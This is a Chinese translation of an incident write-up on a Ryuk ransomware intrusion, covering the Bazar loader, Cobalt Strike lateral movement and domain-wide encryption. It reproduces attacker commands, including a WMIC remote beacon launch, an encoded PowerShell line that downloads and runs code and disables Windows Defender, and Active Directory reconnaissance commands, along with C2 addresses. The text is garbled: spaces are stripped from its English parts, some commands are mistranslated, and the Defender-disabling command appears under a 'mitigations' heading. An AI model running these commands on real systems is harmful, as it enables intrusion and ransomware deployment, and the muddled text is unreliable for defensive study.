一般勒索病毒是通过大规模的垃圾邮件活动和漏洞利用工具传播,但Ryuk更倾向于定制化攻击。事实上,它的加密机制主要用于小规模操作,比如只对受感染网络中的重要资产和资源进行加密。Ryuk勒索病毒最早于2018年8月被国外一家安全公司发现并报告,该勒索病毒主要通过垃圾邮件或漏洞利用工具包传播感染。2020年1月以来,工业企业生产网络或办公网络遭受数十次勒索软件攻击。其中,仅Ryuk勒索病毒就感染了EVRAZ、EMCOR集团、EWA等多家工业企业,加密企业关键数据信息,导致企业停工停产,造成重大经济损失。2019年,美国海岸警卫队(USCG)最近宣布该恶意软件入侵了美国《海上运输安全法》(MTSA)监管机构的企业IT网络。根据USCG的说法,攻击媒介可能是发送给MTSA设施操作员的网络钓鱼电子邮件,一旦员工点击电子邮件中嵌入的恶意链接,勒索软件就会加密受害者重要的企业信息技术(IT)网络信息,从而防止工作人员访问设施中的重要文件。据了解,Ryuk勒索病毒还感染了美国一家工业公司的网络系统。黑客组织控制了货物转运的监控系统和操作系统,并对重要文件进行了加密。如上所述,Ryuk在过去几年非常活跃,FBI声称截至2020年2月,该集团共获利6100万美元。今年年初,这个团体比较安静,但在过去几周发生了像UHS医院那样的事件。今年9月,医院遍布美国和英国的美国最大连锁医院UniversalHealthSystems(UHS)的IT系统遭到勒索软件攻击。系统长期瘫痪,医院被迫转送急诊病人。目前受影响的医院位于亚利桑那州、加利福尼亚州、佐治亚州、宾夕法尼亚州、佛罗里达州等地。该勒索软件加密的文件均带有.ryk的文件扩展名,从黑客留下的勒索信息语法来看,罪魁祸首可能是知名勒索软件Ryuk。一名安全研究人员指出,这一事件表明,Ryuk在数月不活动后重返人间。根据其研究团队的说法,Ryuk可能是通过钓鱼邮件诱使用户打开UHS计算机系统而进入的。Ryuk组织目前发布的勒索软件可以在29小时内向整个域发送恶意邮件,并索要超过600万美元的赎金。攻击者使用CobaltStrike、AdFind、WMI、vsftpd、PowerShell、PowerView和Rubeus等工具来实现他们的勒索目标。在这种情况下,攻击是通过称为Bazar/Kegtap的加载程序恶意软件开始的。研究表明,通过垃圾邮件发送的电子邮件在9月份呈上升趋势。从payload的初始执行开始,Bazar会注入各种进程,包括explorer.exe和svchost.exe,并生成一个cmd.exe进程。此活动的最初目标是使用内置的Windows工具(例如nltest、netgroup和第三方工具AdFind)运行发现。在最初发现之后,Bazar恶意软件一直保持相对安静,直到第二轮攻击全面生效。同样,在第二轮发现中使用了相同的工具以及Rubeus。这一次,攻击被发现通过FTP泄漏到托管在俄罗斯的服务器。接下来,攻击者开始横向移动。使用各种方法进行了多次尝试,从远程WMI到使用PowerShell远程执行服务,直到最终登陆通过SMB交付的CobaltStrike信标可执行文件以在环境中移动。通过这种方式,攻击者依靠在域控制器上运行的CobaltStrike信标作为主要操作点。在选择最可靠的方法遍历环境后,攻击者随后在整个企业中设置信标。为了实现他们的最终目标,他们使用PowerShell在环境中禁用WindowsDefender。首先将域中备份的服务器作为加密目标,在主机上做一些准备工作。然而,一旦Ryuk勒索软件可执行文件从其域控制器(DC)枢轴通过SMB传输,执行它只需要一分钟。此时,Ryuk已通过SMB传输到环境中的其余主机,并通过来自枢轴域控制器的RDP连接执行。该活动从最初执行Bazar到覆盖整个域共持续29小时。攻击者索取了600多个比特币,这些比特币的市值约为600万美元。发现过程要了解有关技术细节和攻击者的策略、技术和过程的更多信息,请继续阅读“MITREATT&CK”部分。InitialMITERATT&CKaccesswasinitiallysentviaemailwithalinktotheBazar/Kegtapbackdoorloader,andresearchersdownloadedandranDocument-Preview.exe,whichconnectsto5.182.210[.]145via443/https.ExecutionServiceExecutionisusedseveraltimesduringlateralmovementtoexecutescriptsandexecutables.WMIwasalsousedwhentryingtoexecutethedlllaterally.WMIC/node:"DC.example.domain"processcallcreate"rundll32C:\PerfLogs\arti64.dll,StartW"Theattackersalsoperformedprocessinjection.缓解措施禁用WindowsDefenderpowershell-nop-execbypass-EncodedCommandSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgA3ADgAMAAxAC8AJwApADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAAJAB0AHIAdQBlAA==检测过程第一天的检测过程在执行Document-Preview.exe后几分钟,AdFind和adf.bat被删除并运行了几分钟。Wehaveseenadf.batmanytimes,youcanlearnmorehere.Thebatchfileoutputstheinformationintothefollowingtextfile.Nltestisusedtocheckdomaintrust.nltest/domain_trusts/all_trustsNetisusedtodisplaydomainadministrators.netgroup"Domainadmins"/DOMAINPingisusedtotestwhetherthesystemisfunctioningproperlyintheenvironment.pinghostname.domain.localbreaksdowntheactiveprocesstreefromtheBazarloaderonday1.第二天的检测进程Afind再次运行,然后攻击者尝试使用Rubeus进行Kerberoast。在失败的横向移动期间多次错误启动后,攻击者执行了一些额外的本地系统检测。systeminfonltest/dclist:Get-NetSubnetGet-NetComputer-operatingsystem*server*Invoke-CheckLocalAdminAccessFind-LocalAdminAccess使用WMI检查许多系统上的当前AntiVirus。WMIC/节点:localhost/命名空间:\\\\root\\SecurityCenter2PathAntiVirusProductGetdisplayName/格式:ListImport-ModuleActiveDirectory;Get-ADComputer-Filter{enabled-eq$true}-properties*|selectName,DNSHostName,OperatingSystem,LastLogonDate|Export-CSVC:\Users\AllWindows.csv-NoTypeInformation-EncodingUTF8横向移动第一天,攻击者在继续进行更多发现之前检查了MS17-010的域控制器。系统不容易受到MS17-010攻击。横向移动在首次进入后大约28小时开始,CobaltStrikeBeacon使用SMB放置在域控制器上。这允许攻击者使用WMIC执行信标。WMIC/node:\"DC.example.domain\"processcallcreate\"rundll32C:\\PerfLogs\\arti64.dll,StartW\"攻击似乎没有成功,因为攻击者不久之后没有明显的命令和控制traffic只是在滩头主机上增加了一个额外的负载,然后在DC上执行了一个服务。解码的Powershell。此后,攻击者复制并执行了CobaltStrike信标可执行文件,并通过域控制器上的服务启动了它。此时,C2连接出现在域控制器上,通过443/https连接到martahzz[.]com–88.119.171[.]75。从滩头主站执行第一次横向移动后约一个小时执行,使用SMBexe执行备用系统的横向移动。攻击者在许多系统上运行信标时遇到问题,并且在至少一个系统上,他们远程安装了驱动器。C:\Windows\system32\cmd.exe/Cdir\\Server\c$命令和控制漏洞vsftpd将域发现(AdFind和Rubeus输出)扩展到45.141.84[.]120。恶意影响者SMB用于传输Ryuk可执行文件,然后从第一个受感染的DC建立RDP连接,然后从备份服务器开始在整个环境中执行勒索软件。在执行备份之前,攻击者在备份服务器上启动了wbadminmsc控制台。在勒索软件执行之前执行命令:所有系统都留下了以下勒索字条:攻击者要求超过600万美元,但愿意谈判。针对Ryuk的一系列攻击,可以采取以下缓解措施,完善入侵检测和入侵防御系统;监控实时网络流量行业标准和最新的病毒检测软件;集中分析那些被监控的主机和服务器日志记录;隔离以防止IT系统访问操作技术(OT)环境;最新的IT/OT网络图;所有关键文件和软件的一致备份;本文翻译自:https://thedfirreport.com/2020/10/08/ryuks-return/如有转载请注明原文地址。
